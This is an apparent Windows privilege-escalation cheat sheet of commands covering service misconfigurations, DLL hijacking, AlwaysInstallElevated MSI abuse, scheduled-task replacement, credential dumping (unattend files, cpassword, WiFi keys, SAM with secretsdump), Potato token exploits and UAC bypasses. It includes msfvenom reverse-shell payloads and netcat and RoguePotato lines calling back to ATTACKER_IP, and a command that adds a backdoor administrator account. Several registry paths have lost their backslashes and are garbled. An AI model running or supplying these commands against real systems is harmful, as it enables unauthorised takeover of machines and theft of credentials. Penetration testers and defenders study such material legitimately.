# System info
systeminfo
hostname
whoami /all
whoami /priv

# OS version and patches
wmic os get Caption,Version,BuildNumber
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Network info
ipconfig /all
route print
netstat -ano
arp -a

# Users and groups
net user
net localgroup
net localgroup Administrators
query user

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """

# PowerShell
Get-WmiObject win32_service | Select-Object Name, PathName | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'}

# If path is: C:\Program Files\Vuln App\service.exe
# Write malicious exe to:
# C:\Program.exe or C:\Program Files\Vuln.exe

# Restart service
sc stop VulnService
sc start VulnService

# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# Modify service binary path
sc config VulnService binpath= "C:\temp\shell.exe"
sc config VulnService binpath= "net user hacker P@ssw0rd /add && net localgroup Administrators hacker /add"

# Restart service
net stop VulnService
net start VulnService

# Check service permissions in registry
Get-Acl -Path HKLM:\System\CurrentControlSet\Services\VulnService | Format-List

# Find missing DLLs (run as admin to monitor all services)
# Use Process Monitor - filter: Result = NAME NOT FOUND, Path ends with .dll

# Common DLL search order:
# 1. Directory of executable
# 2. C:\Windows\System32
# 3. C:\Windows\System
# 4. C:\Windows
# 5. Current directory
# 6. Directories in PATH

# Writable directories to exploit
icacls "C:\Program Files\VulnApp"
icacls "C:\Program Files (x86)\VulnApp"

# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f dll -o hijack.dll

# AlwaysInstallElevated (both must be set)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If enabled, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f msi -o shell.msi

# Install MSI as SYSTEM
msiexec /quiet /qn /i shell.msi

# AutoRun - Check for writable autoruns
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# Check write permissions on autorun binaries
accesschk.exe -wvu "C:\Path\To\AutorunApp.exe"

# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE

# Get task details
schtasks /query /tn "TaskName" /fo LIST /v

# Find tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr /i "TaskName" | findstr /i "Run As User" | findstr /i "SYSTEM"

# Check permissions on task binaries
icacls "C:\Path\To\Task\Binary.exe"
accesschk.exe -wvu "C:\Path\To\Task\Binary.exe"

# If writable, replace with payload
copy C:\temp\shell.exe "C:\Path\To\Task\Binary.exe" /y

# Saved credentials
cmdkey /list
runas /savecred /user:DOMAIN\admin cmd

# Unattend files
dir /s *unattend.xml 2>nul
dir /s *sysprep.xml 2>nul
dir /s *sysprep.inf 2>nul

# Common locations
type C:\unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml

# Group Policy Preferences (cpassword)
dir /s Groups.xml 2>nul
findstr /si cpassword *.xml

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear

# SAM/SYSTEM (if readable)
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
secretsdump.py -sam sam -system system LOCAL

# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,Version,BuildNumber

# Get hotfixes
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt

# Common exploits by version
# Windows 7/2008 R2: MS16-032, MS15-051, MS14-058
# Windows 8/2012: MS16-032, MS15-051
# Windows 10/2016: Various potato exploits

# MS16-032 Secondary Logon Handle
Invoke-MS16032.ps1

# Check Exploit-DB and searchsploit
searchsploit windows kernel privilege escalation

# Check for required privilege
whoami /priv | findstr /i "impersonate assign"

# PrintSpoofer (Windows Server 2016/2019/2022, Win10/11 with Spooler)
PrintSpoofer.exe -i -c "cmd /c whoami"

# GodPotato (.NET 3.5+, works on patched 2019/2022 + Win11)
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\temp\nc.exe ATTACKER 4444 -e cmd.exe"

# SigmaPotato (modernized JuicyPotato + .NET reflection)
SharpSigmaPotato.exe "cmd.exe /c whoami"

# EfsPotato (MS-EFSRPC abuse — works when others are patched)
EfsPotato.exe "whoami" 7

# RoguePotato (older, still useful for 2016/Win10 1809-)
RoguePotato.exe -r ATTACKER_IP -e "cmd.exe" -l 9999

# Check UAC status (0 = off, 1+ = on)
reg query HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA
reg query HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v ConsentPromptBehaviorAdmin

# Enumerate auto-elevate binaries
# https://github.com/hfiref0x/UACME — current technique catalog (90+ methods)

# fodhelper.exe (App Paths registry hijack — works on Win10/11)
reg add "HKCUSoftwareClassesms-settingsShellOpencommand" /d "cmd.exe /c whoami > C:\out.txt" /f
reg add "HKCUSoftwareClassesms-settingsShellOpencommand" /v "DelegateExecute" /f
start fodhelper.exe

# computerdefaults.exe (same registry technique, different binary)
start computerdefaults.exe

# sdclt.exe (App Paths hijack via IsolatedCommand)
reg add "HKCUSoftwareClassesFoldershellopencommand" /d "cmd.exe" /f
reg add "HKCUSoftwareClassesFoldershellopencommand" /v "DelegateExecute" /f
start sdclt.exe

# Use UACME (Akagi.exe) for production-grade implementations
Akagi.exe 61 C:\Windows\System32\cmd.exe